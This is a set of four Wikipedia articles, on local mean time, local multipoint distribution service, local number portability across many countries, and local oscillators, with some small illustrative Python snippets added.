Local mean time (LMT) is a form of solar time that averages out the variations of local apparent time, forming a uniform time scale at a specific longitude. It was used for everyday purposes during the 19th century, before time zones were introduced beginning in the late 19th century; it still has some uses in astronomy and navigation. [ 1 ]
The difference between local mean time and local apparent time is the equation of time .
Local mean time was used from the early 19th century, when it replaced local solar (sundial) time, until standard time was adopted on various dates in various countries. Each town or city kept time by its own meridian, so locations one degree of longitude apart had times four minutes apart. [ 2 ] This became a problem in the mid-19th century, when railways needed clocks for railway time that were synchronized between stations, while local people needed to match their clocks (or the church clock) to the timetables. Standard time means that the same time is used throughout some regional time zone; usually it is at an offset from Greenwich Mean Time or from the local mean time of the capital of the region.
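Since the Earth turns 360 degrees in 24 hours, each degree of longitude shifts local mean time by four minutes. A minimal sketch of this arithmetic in Python (the function name and example longitudes are illustrative, not from the source):

```python
def lmt_offset_minutes(longitude_deg: float) -> float:
    """Offset of local mean time from Greenwich Mean Time, in minutes.

    The Earth rotates 360 degrees in 24 hours, i.e. 15 degrees per hour,
    so each degree of longitude corresponds to 4 minutes of time.
    Eastern longitudes are positive and run ahead of Greenwich.
    """
    return longitude_deg * 4.0

# Two towns one degree of longitude apart keep times four minutes apart:
print(lmt_offset_minutes(-74.0))  # -296.0 minutes (about 4 h 56 min behind GMT)
print(lmt_offset_minutes(-75.0))  # -300.0 minutes
```

| https://en.wikipedia.org/wiki/Local_mean_time |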
Local multipoint distribution service ( LMDS ) is a broadband wireless access technology originally designed for digital television transmission (DTV). It was conceived as a fixed wireless, point-to-multipoint technology for use in the last mile . [ 1 ] LMDS commonly operates on microwave frequencies across the 26 GHz and 29 GHz bands. In the United States, frequencies from 31.0 through 31.3 GHz are also considered LMDS frequencies. [ 2 ]
Throughput capacity and reliable distance of the link depend on common radio link constraints and the modulation method used, either phase-shift keying or amplitude modulation . Distance is typically limited to about 1.5 miles (2.4 km) due to rain fade attenuation. Deployment links of up to 5 miles (8.0 km) from the base station are possible in some circumstances, such as point-to-point systems, which can reach slightly farther because of increased antenna gain .
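Rain fade dominates the link budget at these frequencies. The sketch below uses the standard power-law rain-attenuation model, specific attenuation gamma = k * R^alpha in dB/km (the form used by ITU-R P.838); the default coefficients are rough illustrative figures for the ~28 GHz range, not values from this article or from the ITU tables:

```python
def rain_attenuation_db(rain_rate_mm_h: float, path_km: float,
                        k: float = 0.2, alpha: float = 1.0) -> float:
    """Total rain attenuation over a path, using gamma = k * R**alpha (dB/km).

    k and alpha depend on frequency and polarization; the defaults here
    are only ballpark values for links near 28 GHz.
    """
    gamma_db_per_km = k * rain_rate_mm_h ** alpha
    return gamma_db_per_km * path_km

# Heavy rain (25 mm/h) over a typical 2.4 km hop vs. a stretched 8 km hop:
print(rain_attenuation_db(25, 2.4))  # ~12 dB of extra loss
print(rain_attenuation_db(25, 8.0))  # ~40 dB -- why long hops need extra gain/margin
```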
There was interest in LMDS in the late 1990s and it became known in some circles as "wireless cable" for its potential to compete with cable companies for provision of broadband television to the home. The Federal Communications Commission auctioned spectrum for LMDS in 1998 and 1999. [ 3 ]
Despite its early potential and the hype that surrounded the technology, LMDS was slow to find commercial traction. Many equipment and technology vendors [ who? ] simply abandoned their LMDS product portfolios.
Industry observers [ who? ] believe that the window for LMDS has closed with newer technologies replacing it. Major telecommunications companies have been aggressive about deploying alternative technologies such as IPTV and fiber to the premises , also called "fiber optics". Moreover, LMDS has been surpassed in both technological and commercial potential by the LTE , WiMax and 5G NR standards.
Although some operators use LMDS to provide access services, LMDS is more commonly used for high-capacity backhaul for interconnection of networks such as GSM , UMTS , LTE and Wi-Fi .
Multichannel multipoint distribution service | https://en.wikipedia.org/wiki/Local_multipoint_distribution_service |
Local number portability ( LNP ) for fixed lines , and full mobile number portability ( FMNP ) for mobile phone lines, refers to the ability of a "customer of record" of an existing fixed-line or mobile telephone number assigned by a local exchange carrier (LEC) to reassign the number to another carrier ("service provider portability"), move it to another location ("geographic portability"), or change the type of service ("service portability"). [ 1 ] In most cases, there are limitations to transferability with regards to geography, service area coverage, and technology. Location Portability and Service Portability are not consistently defined or deployed in the telecommunication industry. [ 2 ]
In the United States and Canada, mobile number portability is referred to as WNP or WLNP (Wireless LNP). [ 3 ] In the rest of the world it is referred to as mobile number portability (MNP). [ 4 ] Wireless number portability is available in some parts of Africa, Asia, Australia, Latin America and most European countries including Britain; however, this relates to transferability between mobile phone lines only. Canada, South Africa and the United States are the only countries that offer full number portability transfers between both fixed lines and mobile phone lines. [ 5 ] This is possible because, in these countries, mobile and fixed-line numbers are mixed in the same area codes and are billed identically for the calling party, with the mobile user usually paying for incoming calls and texts; in other countries, all mobile numbers are placed in higher-priced mobile-dedicated area codes and the originator of the call to the mobile phone pays for it. The government of Hong Kong has tentatively approved fixed-mobile number portability; however, as of July 2012, this service is not yet available.
Some cellular telephone companies will charge for this conversion as a regulatory cost recovery fee.
LNP was invented by Edward Sonnenberg while working for Siemens.
Though it was introduced as a tool to promote competition in the heavily monopolized wireline telecommunications industry, [ 6 ] number portability became popular with the advent of mobile telephones , since in most countries different mobile operators are provided with different area codes and, without portability, changing one's operator would require changing one's number. Some operators, especially incumbents with large existing subscriber bases, have argued against portability on the grounds that providing this service incurs considerable overhead, while others argue that it prevents vendor lock-in and allows them to compete fairly on price and service. Due to this conflict of interest, number portability is usually mandated for all operators by telecommunications regulatory authorities. In the US, LNP was mandated by the Federal Communications Commission (FCC) in 1996. [ 6 ] The mandate required all carriers in the top 100 metropolitan statistical areas (MSAs) to be "LNP-capable" and to port numbers to any carrier sending a BFR (bona fide request). The ability to keep a number while switching providers is thought to be attractive to consumers. [ 7 ] CLECs ( competitive local exchange carriers ) also argued that the lack of portability kept customers from leaving ILECs ( incumbent local exchange carriers ), thus hindering competition. Details regarding the reasons for LNP and how it is to be implemented can be found in the First Report and Order referenced above.
In the US, the FCC has mandated this in order to increase competition among providers. As of late November 2003, LNP was required for all landline and wireless common carriers , so long as the number is being ported to the same geographical area or telephone exchange . This latest mandate included carriers outside the top 100 MSAs that previously enjoyed a rural carrier exemption.
There are four main methods to route a call to a number whose operator has changed. [ 8 ] [ 9 ]
All Call Query (ACQ): The operator that originates the call always checks a centralized database and obtains the route for the call. The originating operator then routes the call to the serving network.
Query on Release (QoR): The operator that originates the call first checks with the operator to which the number initially belonged, the donor operator. The donor operator releases the call and informs the originating operator that it no longer possesses the number. The operator that originates the call then checks the centralized database, as is done with ACQ.
Call Dropback, also known as Return to Pivot (RoP): The operator that originates the call first checks with the donor operator. The donor operator checks its own database and provides a new route. The operator that originates the call then uses this route to forward the call. No central database is consulted.
Onward Routing (OR): The operator that originates the call routes the call to the donor operator. The donor operator checks its own database, obtains a new route, and routes the call onward to the new operator. This model is also called indirect routing.
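As a rough illustration of how these schemes differ in where the routing lookup happens, here is a minimal Python sketch of the two database-driven methods (ACQ and QoR); the data structures, numbers and carrier names are hypothetical, not from any carrier specification:

```python
# Hypothetical sketch contrasting where the lookup happens in ACQ vs. QoR.
CENTRAL_DB = {"+15551234567": "carrier-B"}   # ported number -> serving network
DONOR_OWNED = {"+15559876543"}               # numbers the donor still serves

def route_acq(dialed: str, default_carrier: str) -> str:
    """All Call Query: always consult the central database first."""
    return CENTRAL_DB.get(dialed, default_carrier)

def route_qor(dialed: str, donor_carrier: str) -> str:
    """Query on Release: try the donor first; consult the central
    database only when the donor reports the number as ported away."""
    if dialed in DONOR_OWNED:
        return donor_carrier                      # donor still serves the number
    return CENTRAL_DB.get(dialed, donor_carrier)  # released -> central lookup

print(route_acq("+15551234567", "carrier-A"))  # -> carrier-B
print(route_qor("+15551234567", "carrier-A"))  # -> carrier-B
```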
Complexity for number portability can come from many sources. Historically, numbers were assigned to various operators in blocks. The operators, who were often also service providers, then provided these numbers to the subscribers of telephone services. Numbers were also recycled in blocks. With number portability, it is envisioned that the size of these blocks may shrink, even down to single numbers. Once this occurs, the granularity of such operations will represent a greater workload for the telecommunications provider.
With phone numbers assigned to various operators in blocks, the system worked quite well in a fixed line environment since everyone was attached to the same infrastructure. The situation becomes somewhat more complex in a wireless environment such as that created by cellular communications .
In number portability the “donor network” provides the number and the “recipient network” accepts the number. The operation of donating a number requires that a number be “snapped out” from a network and “snapped into” the receiving network. If the subscriber ceases to need the number then it is normal that the original donor receive the number back and “snaps back” the number to its network. The situation is slightly more complex if the user leaves the first operator for a second and then subsequently elects to use a third operator. In this case the second operator will return the number to the first and then it is assigned to the third.
In cellular communications the concept of a location registry exists to tie a “mobile station” (such as a cellular phone) to the number. If a number is dialed it is necessary to be able to determine where in the network the mobile station exists. Some mechanism for such forwarding must exist. (For an example of such a system, see the article on the GSM network.)
In the US, there are standards for portability defined by the FCC, the LNPA, NANPA and ATIS, agreed upon by all member providers to help make LNP as cost-efficient and expedient as possible while retaining a healthy level of security for all providers and a high level of customer service. These rules, first defined in the 1st, 2nd and 3rd Reports and Orders by the FCC (publicly available at fcc.gov), are further detailed by the LNPA in order to ensure any provider can successfully port numbers to any other provider. iconectiv provides a national database called the NPAC (Number Portability Administration Center), which contains the correct routing information for all ported and pooled numbers in the US and Canada. [ 10 ] The NPAC maintains detailed documentation of the procedure common among US carriers to port numbers as described here.
Providers use SS7 to route calls throughout the US/Canada network. SS7 accesses databases for various services such as CNAM, LIDB , VSC and LNP. When a customer calls a ported number, the dialed number is sent to the provider's SSP (Service Switching Point), where it is identified as either a local call or not. If the call is local, the switch has the NPA-NXX marked as portable in its routing table, so it sends a routing request to the Signal Transfer Point (STP), which accesses a local database updated by an LSMS (Local Service Management System) holding the routing for all ported numbers for which the carrier is responsible for completing calls. If routing information is found, a response to the "query" is returned containing the information necessary to properly route the call. If it is not a local number, the call is passed on to the STP and routed until it reaches a local carrier, which performs the "query" mentioned earlier and routes the call accordingly.
The routing information necessary to complete these calls is known as a Location Routing Number (LRN). The LRN is simply a 10-digit telephone number that resides in the switch of the service provider currently serving the ported telephone number.
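A toy rendering of the call-completion logic above (the SSP checks whether the NPA-NXX is marked portable, queries for an LRN, and otherwise passes the call on); all names and data here are invented for illustration:

```python
PORTABLE_NPANXX = {"555123"}           # prefixes marked portable in the routing table
LRN_DB = {"5551234567": "5559990000"}  # ported number -> LRN of the serving switch

def complete_call(dialed: str, is_local: bool):
    """Simplified SSP logic for a call to a possibly ported number."""
    if not is_local:
        return ("pass to STP", dialed)      # a downstream local carrier will query
    if dialed[:6] in PORTABLE_NPANXX:
        lrn = LRN_DB.get(dialed)            # the "query" via STP -> LSMS-fed database
        if lrn:
            return ("route on LRN", lrn)
    return ("route on dialed number", dialed)

print(complete_call("5551234567", is_local=True))  # ('route on LRN', '5559990000')
```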
When a provider receives a request to port a telephone number from a new customer, that provider sends an industry-standard Local Service Request (LSR) to the existing (or "old") provider. When the old provider receives this request, it sends back a Firm Order Confirmation (FOC) and the process of porting the number(s) begins. Either provider can initiate the port using a Service Order Activator (SOA or LSOA), which directly edits the NPAC database mentioned before. Providers can also make these requests within the NPAC database directly. If the new provider initiates the port, it is called a "pull," and if the old provider initiates, it is a "push." Once the number is pulled or pushed, the providers must confirm the request, and the new provider must "activate" the number using the LRN of the switch serving the customer on the agreed due date. Once this is completed, the number is ported.
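The LSR/FOC exchange and the NPAC activation step described above amount to a small state machine. The following Python sketch models it purely for illustration; the state names and transitions are a simplified reading of the process above, not an industry-defined schema:

```python
from enum import Enum, auto

class PortState(Enum):
    LSR_SENT = auto()      # new provider sends a Local Service Request
    FOC_RECEIVED = auto()  # old provider returns a Firm Order Confirmation
    CREATED = auto()       # port created in the NPAC (a "pull" or a "push")
    CONFIRMED = auto()     # both providers confirm the request
    ACTIVATED = auto()     # new provider activates with its switch's LRN

def next_state(state: PortState) -> PortState:
    """Advance the simplified port workflow one step."""
    order = list(PortState)
    return order[min(order.index(state) + 1, len(order) - 1)]

s = PortState.LSR_SENT
while s is not PortState.ACTIVATED:
    s = next_state(s)
    print(s.name)
```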
Much of this process is duplicated in intermodal portability (porting between wireline and wireless providers). There are a few technical differences in WLNP, however, especially with regard to the time intervals allowed.
Some service providers, especially related to fax services, do not qualify as a "local exchange carrier" or other form of telecommunications carrier. [ 11 ] Such service providers may be the "customer of record" from the LEC's perspective. As a result, the applicable law may not require that such service provider port out the number to another provider. Users and providers often negotiate portability and port out fees. [ 12 ] eFax is one vendor that claims it is not a telecommunications company and does not allow porting out of numbers originally assigned by them to their customers; however, numbers ported by customers into eFax may be ported out. [ 13 ]
A fax machine connected to its own physical telephone line at the subscriber's premises is portable in the same manner as any other standard wireline service. Distinctive ring sometimes poses problems, as one landline may have two or three numbers with a fax or dial-up modem programmed to answer just one of the secondary numbers on the line. Porting out the main number will usually unsubscribe the entire line, disconnecting the secondary numbers without moving them to the new provider.
In Canada, pocket pager answering services are exempted from all local number portability requirements. The same is not true of mobile telephones , which are fully portable to another carrier or another service type (such as landline or voice over IP ) within the same local interconnection region . [ 14 ]
In Kenya , it was announced in 2004 that mobile number portability would be available as of July 1, 2005, and fixed-line number portability as of July 1, 2006. [ 15 ] Mobile number portability was officially launched on April 1, 2011. [ 16 ]
In South Africa , the Number Portability Company (Pty) Ltd (Reg. No. 2005/040348/07) was established in 2005, and mobile number portability was introduced on 10 November 2006. Geographic number portability (between fixed operators) was introduced on 26 April 2010. The Number Portability Company is jointly owned by the mobile and fixed operators, including Vodacom, MTN, Cell C, Telkom and Neotel. [ 17 ]
In Argentina , full mobile number portability has been available since March 2012, under a law approved in 2000. It originally took up to ten working days to take effect. [ 18 ] Since July 2017, however, it takes up to 24 hours. [ 19 ]
In Brazil , number portability (both fixed and mobile) has been available nationwide since March 2009. However, it is not possible to port a fixed-line number to a mobile number or vice versa. [ 20 ] [ 21 ] A fixed-line number can be carried within the same municipality, and a mobile number within the same area code (which covers anywhere from part of a state to an entire state).
In Canada , wireline/competitive local exchange carriers must provide portability. As of March 14, 2007, wireless carriers must provide portability in most of Canada. [ 22 ]
Numbers are only portable within a LIR ( local interconnection region ), regions defined by the ILEC and approved by the Canadian Radio-television and Telecommunications Commission (CRTC), each of which covers a number of exchanges. Each LIR has a Point of Interconnection (POI) exchange through which calls are routed, and if a number is ported out to a different LIR then calls to that destination will be rejected by the POI switch.
Not all exchanges support LNP; typically, competition must exist within an exchange before an ILEC will enable portability, and then only by request. Most small local independent telephone company exchanges are exempted from competition and local number portability requirements. Numbers in the rarely used non-geographic area code 600 are not portable.
In the Dominican Republic , number portability for both mobile and local telephony was launched on September 30, 2009. In March 2009, the Dominican Telecommunications Institute (INDOTEL) selected Informática El Corte Inglés to administer number portability. [ 23 ]
In Ecuador , mobile number portability has been available since 12 October 2009.
Mexico was the first Latin American country to have number portability in both mobile and local telephony. [ 24 ] The Federal Commission of Telecommunications ( COFETEL ) applied this rule as part of its regulation of the Telmex monopoly. It was also a condition for Telmex to enter the triple play video market [ citation needed ] . Number portability has been available since July 5, 2008. [ 24 ] The service used to be administered by Telcordia Technologies . [ 24 ]
On August 29, 2019, the Federal Telecommunications Institute (IFT) announced that at the request of the telecommunications service providers, it would migrate its portability database administration to Mediafon Datapro. As a result, portability was temporarily suspended from August 30 to September 1. [ 25 ] On September 2, portability was resumed with the service now being handled by Mediafon Datapro. [ 26 ]
In the United States , 47 U.S.C. § 251 (b)(2), added by the Telecommunications Act of 1996 , requires all local exchange carriers (LECs) to offer number portability in accordance with the regulations of the Federal Communications Commission (FCC). [ 27 ] The FCC implemented regulations on 27 June 1996, with LECs required to implement them in the 100 largest Metropolitan Statistical Areas by 1 October 1997 and elsewhere by 31 December 1998. [ 28 ] (The regulations are currently located at 47 CFR 52 , 47 CFR 52.20 et seq. ) The North American Numbering Council (NANC) was directed to select the Local Number Portability Administrators (LNPAs), akin to the North American Numbering Plan Administrator (NANPA), which administers the North American Numbering Plan . [ 29 ]
LNP was first implemented in the US upon the establishment of the original Number Portability Administration Center (NPAC) in Chicago , Illinois , in 1998. This service covered select rate centers in the Ameritech region. Thereafter, as switches and telephone networks were upgraded with location routing number (LRN) capability, LNP was deployed sequentially to the remaining Regional Bell Operating Company (RBOC) areas. The FCC has since mandated Wireless Local Number Portability starting November 24, 2003 (in metropolitan areas) and allowed operators to charge an additional monthly Long-Term Telephone Number Portability End-User Charge as compensation. On November 10, 2003, the FCC additionally ruled that number portability applies to landline numbers moving to mobile telephones and, on October 31, 2007, the FCC made clear that the obligation to provide LNP extends to VoIP providers. [ 30 ]
Toll-free telephone numbers (area code +1-800) have been portable through the RespOrg system since 1993 in the US [ 31 ] and 1994 in Canada.
In Hong Kong , fixed-line number portability has been available since July 1, 1995, the day of fixed-line telephone market liberalization (i.e., the reversal of the franchised monopoly), which was a requirement of the government. [ 32 ] Mobile number portability has been available since March 1, 1999. [ 33 ] Although the government allowed porting a fixed-line number to a mobile carrier or vice versa, the introduction of this service was left to the fixed/mobile carriers on a voluntary basis. As of October 2009, fixed-mobile number portability is not available. [ 34 ]
In India , mobile number portability was launched in the state of Haryana on November 25, 2010. It was finally launched all over India on January 20, 2011.
In Japan , fixed-line portability began in March 2001. 番号ポータビリティー制度 (bangō portability seido, "number portability system", commonly referred to as portability or MNP) began on October 24, 2006. [ 35 ] [ 36 ] Users are able to change cellular phone carriers without changing their number for a fee of 5000 yen. However, e-mail addresses are subject to change, and downloaded music/data may become unusable.
The Japanese Ministry of Internal Affairs and Communications (MIC) spent three years putting mobile number portability into practice, after its initial workgroup started in November 2003. As a result, NTT DoCoMo, KDDI and Softbank accelerated their price battle, but it had little effect due to already competitive price plans and customer loyalty. Overall, mobile number portability in Japan was not very successful, because of high transition costs for the customer due to SIM lock , the long time it took to establish mobile number portability, which allowed operators to fence in subscribers with price plans, and the significance of mobile Internet mail.
In Malaysia , mobile number portability was planned to start by mid-2008, according to an article by the national news agency Bernama.
In Pakistan ( پاکستان ), the PTA mandated mobile number portability on March 23, 2007. Users are able to change their cellular phone service for free; they need only pay for a new SIM card, depending on the provider to which they are migrating, and some companies do not charge anything. [ 37 ]
Singapore was one of the first countries to introduce number portability for mobile telephones, in 1997. This was initially implemented through voice call and SMS forwarding. True number portability was realized on June 13, 2008, with the implementation of a Centralised Number Portability Database Solution, as proposed by the Infocomm Development Authority (IDA) of Singapore. [1]
In South Korea , mobile number portability service started on January 1, 2004. Unlike in other countries, it started with SK Telecom, the dominant operator, which has over 50% market share. To prevent users churning to the dominant operator, the government delayed portability for the second and third operators by six months and one year, respectively. As a result, only SK Telecom's subscribers could move to other operators during the first six months. [ 38 ]
In Sri Lanka , mobile number portability service started in August 2007. It is supported by Sri Lanka Telecom-owned Mobitel and the other cellular operators.
In the European Union , all telephone providers are required to provide number portability under the Universal Service Directive (2002/22/EC).
In Albania , mobile number portability was implemented on May 4, 2011, according to the regulator AKEP. For fixed-line numbers, it started in some geographical areas in September 2012 and was available throughout the country by April 1, 2013.
In Austria , number portability was implemented in October 2004.
In Belgium , number portability was implemented in October 2002.
In Cyprus , geographic, non-geographic and mobile number portability is required as of July 12, 2004. [ 39 ]
In Denmark , portability of fixed-line numbers and ISDN was implemented on January 1, 2001. Mobile number portability was implemented on July 1, 2001. [ 40 ] In 2006, 238,293 fixed lines were ported, along with 456,159 mobile lines. Given that at the end of 2006 there were 2,974,000 fixed lines and 5,828,000 mobile lines, [ 41 ] roughly 7.9% of lines were ported in 2006.
In Estonia , number portability has been required of fixed operators since January 1, 2004, and of mobile operators since January 1, 2005. [ 39 ]
In Finland , mobile number portability was implemented on July 25, 2003. [ 42 ] The impact of mobile number portability in Finland exceeds that of other countries. In one year (June 2003 – June 2004), the combined market share of TeliaSonera, Elisa and DNA fell from 98.7% to 87.9%. [ 43 ]
In France , geographic number portability has been available since January 1, 1998. From January 1, 2001, it became possible to change geographic location or operator while keeping the same number. [ 44 ] Mobile number portability was introduced on June 30, 2003. [ 45 ] However, due to its lack of effectiveness, a new system was launched on May 21, 2007, with two objectives: giving the customer a single point of contact (the new operator takes all the steps for mobile number portability) and a maximum period of ten days for mobile number portability to take effect. [ 46 ]
In Germany , fixed number portability was introduced on January 1, 1998, for geographic numbers and numbers for non-geographic services. Mobile number portability was implemented on November 1, 2002. [ 39 ]
In Greece , fixed number portability has been available since January 1, 2003. Mobile number portability was implemented on March 1, 2004. [ 39 ]
In Hungary , portability has existed for geographic numbers since January 1, 2004, and for non-geographic numbers (including mobile numbers) since May 1, 2004. [ 39 ] A special area code, +36 21 , has also been added, which allows a phone number (with the +36 country code prefix) to be used anywhere in the world.
In Ireland , local number portability was implemented in 2000, using an IN solution with a shared routing database. Partial mobile number portability was introduced in 1997 with full portability becoming available in 2003.
In Italy , mobile number portability has been available since April 30, 2002. [ 47 ]
In Luxembourg , mobile number portability was introduced in June 2004. The Mobile Number Portability Central (MNPC), managed by the G.I.E Telcom operator group and developed, installed and operated by Systor Trondheim AS of Norway, was put into commercial operation in February 2005.
In Norway , fixed number portability was introduced in 2000, one year before the introduction of mobile number portability. The administrative solution for fixed and mobile number portability in Norway, the National Reference Database (NRDB), was put into service in 2000. The NRDB is owned and managed by the eight largest network operators in Norway through the company NRDB AS. The reference database was developed and installed by, and is presently operated by, Systor Trondheim AS.
In Portugal , fixed number portability was implemented on June 30, 2001. Mobile number portability has been available since January 1, 2002. [ 48 ] The administrative Reference Entity (Entidade de Referência, ER), interconnecting all network operators and service providers, is operated by a local third party, Portabil S.A., a joint venture between Logica and Systor Trondheim AS .
In Slovakia , number portability was implemented in May 2004.
In Spain , number portability among cell phone carriers has been available since October 1, 2000, without any cost to the end user. The technical details of the process are regulated by the CMT (Comisión del Mercado de las Telecomunicaciones, or Telecoms Market Commission), and all carriers are obliged to comply with its requirements. As of August 2007, cell number portability must complete within 5 business days (i.e., excluding weekends) from the moment the request is confirmed by the customer, with the actual switch occurring late at night to avoid missing any calls. The user wakes up using a new SIM card from the new cell provider while keeping the number.
In the mature Spanish cell phone market (as of June 2007, with 107 lines per 100 inhabitants [ 49 ] ), portability has been widely used by the competing carriers as a way to poach each other's customers, usually by offering them free handsets or extra credit. From June 2006 to June 2007 alone, 3,957,556 cell phone lines switched carriers via this procedure, about 10% of all cellular lines in use. [ 49 ] Spain is the European Union country where the most customers have switched cell phone providers, with more than 9 million carrier switches completed as of April 2007. [ 50 ]
In the fixed-line market, number portability has also been available since 2000, but weaker competition meant that adoption of fixed number portability was quite sluggish. As of August 2004, 1,041,246 fixed-line switches had been completed. [ 51 ]
The fixed-line market is peculiar in Spain, since only two local-loop providers can operate in each particular region (or demarcación, as regulated by the CMT): a cable carrier (such as Ono, R and others) and the former state monopoly ( Telefónica ). The only one operating nationwide, Telefónica, is obliged to provide other firms with access to its exchange facilities or rental/transfer of its copper last-mile loops, at fees regulated by the CMT (a practice known as local loop unbundling ). As cable providers do not have a nationwide footprint, many users have no actual chance of applying for "true" fixed number portability, that is, giving up Telefónica's service altogether. Some of them can, however, get their service from a third company that bills the service and then pays Telefónica the copper-pair rental and maintenance fees, with the customer receiving a single bill. In the end, as Telefónica set up a reselling program for its fixed lines and DSL internet access, the former monopoly is still very much in control of the fixed-line market, including profitable broadband access. In fact, Telefónica was fined in excess of €152 million by the European Commission on July 4, 2007, on the grounds of "impeding competition on the Spanish broadband internet access market for more than five years, and so depriving consumers and business of a choice of broadband suppliers". [ 52 ]
Due to the billing scheme used throughout Europe and most of the world, where the calling party assumes the full cost of the call, and calling a cellphone is usually more expensive than calling a fixed line, a distinction must be made between cellphone numbers (beginning with "6" or, from October 2011, "71", "72", "73" or "74") and fixed numbers (usually beginning with 9 or 8). Full number portability, in which a customer transfers a cell number to a fixed number or vice versa, is thus not possible. See Telephone numbering in Spain for more information.
In Sweden , fixed-line portability was implemented in 1999, and mobile number portability was implemented on September 1, 2001. At the introduction of mobile number portability, the Swedish operators joined forces and procured a central solution, the SNPAC CRDB, a central reference database now containing both the fixed and mobile portings. [ 53 ] [ 54 ]
In Switzerland , mobile number portability has been available since March 1, 2000, [ 55 ] and land-line number portability since April 2002. [ 56 ]
In Turkey , mobile number portability was implemented in November 2008. Fixed number portability was initially planned to follow exactly six months later, on May 9, 2009; however, it was not until September 9, 2009 that the regulator approved the procedure for fixed number portability. Since then, the fixed and mobile operators and the incumbent have been working to get the process going and performing interoperability tests. However, fixed number portability has not progressed as punctually as mobile number portability did. [ 57 ]
In the United Kingdom , Ofcom directs fixed-line telephone network providers , mobile phone providers and broadband service providers to provide number portability under the Porting Authorisation Code rules and the Migration Authorisation Code code of practice, respectively. As the UK was an EU member country, the Ofcom direction was intended to reflect the requirements of EU Directive 2002/22/EC.
In Serbia , number portability service on public telephone networks at a fixed location is available as of 1 April 2014.
In Israel , number portability is free and takes 15 minutes. All cellular lines can be ported. Landline numbers may be ported, except between regions (area codes). Wireless and VoIP companies each have a single area code for the whole country; within it, numbers may be ported with no regard to geographic area.
There is no porting between landline and cellular lines.
In Oman , Mobile Number Portability was mandated on the Public Mobile Operators, Nawras and Oman Mobile , via the licenses issued to them by the Telecommunications Regulatory Authority (TRA). Mobile number portability was launched on August 26, 2006. Users are able to change cellular phone carriers without changing their number for a nominal fee of 3 OMR. [ 58 ]
In Saudi Arabia , mobile number portability was launched on July 8, 2006, making it the first country in the Middle East region to launch this service. A centralized number portability clearinghouse (NPC) solution was implemented by the CITC (the telecom regulation authority), and the two mobile phone operators were obliged to implement the MNP solution in their networks and to interface with the NPC. The service was provided to mobile subscribers for free.
In Australia , local telephone numbers have been portable since 1999. The porting process is based on a peer-to-peer file exchange between fixed-line operators. According to ACMA, local number portability came into full effect at the start of 2000. Mobile number portability has been available since September 25, 2001. [ 59 ]
For service providers who require knowledge of porting activity to enable them to deliver voice calls directly to the current "network owner", they can either form agreements with all of the fixed-line operators, or use a third-party LNP provider, such as Paradigm.One .
In New Zealand , local and mobile number portability (LMNP) began on April 1, 2007. The rules governing LMNP originate in the Number Portability Determination. Ports are authorised, scheduled, and coordinated via a centralised number portability system called IPMS (Industry Portability Management System). All networks update their own routing and confirm this to IPMS. There are now 26 carriers and service providers that participate in LMNP in New Zealand, and over a million numbers have been ported. | https://en.wikipedia.org/wiki/Local_number_portability |
In electronics , the term local oscillator (LO) refers to an electronic oscillator when used in conjunction with a mixer to change the frequency of a signal. This frequency conversion process, also called heterodyning , produces the sum and difference frequencies from the frequency of the local oscillator and frequency of the input signal. Processing a signal at a fixed frequency gives a radio receiver improved performance.
In many receivers, the functions of local oscillator and mixer are combined in one stage called a " converter ", which reduces space, cost, and power consumption by combining both functions in one active device.
The term local refers to the fact that the frequency is generated within the circuit and is not reliant on any external signals, although the frequency of the oscillator may be tuned according to external signals.
Local oscillators are used in the superheterodyne receiver , the most common type of radio receiver circuit. In this application, the frequency of the local oscillator (LO) is chosen to be similar to the radio frequency (RF) received on the antenna, such that the difference between them is much smaller than the RF. Either high-side injection (where the LO frequency is greater than the RF) or low-side injection (where the LO frequency is less than the RF) may be employed. The difference can then be filtered from the sum to extract the intermediate frequency (IF).
So the frequency chosen for the local oscillator should be $f_{\mathrm{LO}} = f_{\mathrm{RF}} \pm f_{\mathrm{IF}}$.
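A short numeric sketch of this choice in Python, including the image frequency that the receiver's front-end filtering must reject (a standard consequence of mixing, stated here as general radio knowledge rather than something from this article):

```python
def lo_choices(f_rf: float, f_if: float):
    """Return (high-side LO, low-side LO): f_LO = f_RF +/- f_IF."""
    return f_rf + f_if, f_rf - f_if

def image_frequency(f_rf: float, f_if: float, high_side: bool) -> float:
    """The image lies on the far side of the LO, offset from the RF by 2*f_IF."""
    return f_rf + 2 * f_if if high_side else f_rf - 2 * f_if

# Classic AM broadcast example: tune 1000 kHz with a 455 kHz IF (values in MHz).
hi, lo = lo_choices(1.000, 0.455)
print(hi, lo)                               # 1.455 MHz (high side), 0.545 MHz (low side)
print(image_frequency(1.000, 0.455, True))  # 1.910 MHz image for high-side injection
```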
They are also used in many other communications circuits such as modems , cable television set top boxes , frequency division multiplexing systems used in telephone trunklines , microwave relay systems, telemetry systems, atomic clocks , radio telescopes , and military electronic countermeasure (antijamming) systems.
In satellite television reception, the microwave frequencies used from the satellite down to the receiving antenna are converted to lower frequencies by a local oscillator and mixer mounted at the antenna. This allows the received signals to be sent over a length of cable that would otherwise have unacceptable signal loss at the original reception frequency. In this application, the local oscillator is of a fixed frequency and the down-converted signal frequency is variable.
The performance of a signal processing system depends, amongst other factors, on the characteristics of the local oscillator.
A crystal oscillator is one common type of local oscillator that provides good stability and performance at relatively low cost, but its frequency is fixed, so changing frequencies requires changing the crystal. Tuning to different frequencies requires a variable-frequency oscillator which leads to a compromise between stability and tunability. With the advent of high-speed digital microelectronics, modern systems can use frequency synthesizers to obtain a stable tunable local oscillator, but care must still be taken to maintain adequate noise characteristics in the result. Phase-locked loops are an alternative means of generating precise LO frequencies. By synchronizing with another frequency source, this method ensures a high level of accuracy and stability. [ 5 ]
Detection of local oscillator radiation may disclose the presence of the receiver, such as in detection of automotive radar detectors , or detection of unlicensed television broadcast receivers in some countries. During World War II , Allied soldiers were not allowed to have superheterodyne receivers because the Axis soldiers had equipment which could detect the local oscillator emissions. This led to soldiers creating what is now known as a foxhole radio , a simple improvised radio receiver which has no local oscillator.
The better World War II-era military communication receivers were engineered to suppress local oscillator emissions. For example, the famous RCA AR-88 has excellent shielding. It also uses two tuned pentode RF stages ahead of the superheterodyne mixer. Pentode tubes have virtually zero reverse gain, so LO emissions could not leak back out through the antenna. | https://en.wikipedia.org/wiki/Local_oscillator |
